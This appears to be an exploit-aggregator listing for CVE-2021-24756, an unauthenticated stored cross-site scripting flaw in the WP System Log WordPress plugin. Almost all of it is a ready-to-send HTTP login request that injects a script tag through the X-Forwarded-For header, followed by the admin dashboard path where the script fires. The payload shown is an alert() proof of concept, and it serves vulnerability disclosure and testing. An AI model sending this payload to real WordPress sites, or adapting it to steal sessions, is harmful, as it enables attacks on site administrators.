Exploit for WP System Log < 1.0.21 - Unauthenticated Stored Cross-Site Scripting CVE-2021-24756

Name: Exploit for WP System Log < 1.0.21 - Unauthenticated Stored Cross-Site Scripting CVE-2021-24756
Rating: 5 (74 reviews)

2021-11-15 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:0CEA0717-8F54-4F1C-B3EE-AFF7DD91BF59
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
X-Forwarded-For: <script>alert(/XSS/)</script>
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

log=a&pwd=b&wp-submit=Log+In


The XSS will be triggered in the Activity Log dashboard: /wp-admin/admin.php?page=winteractivitylog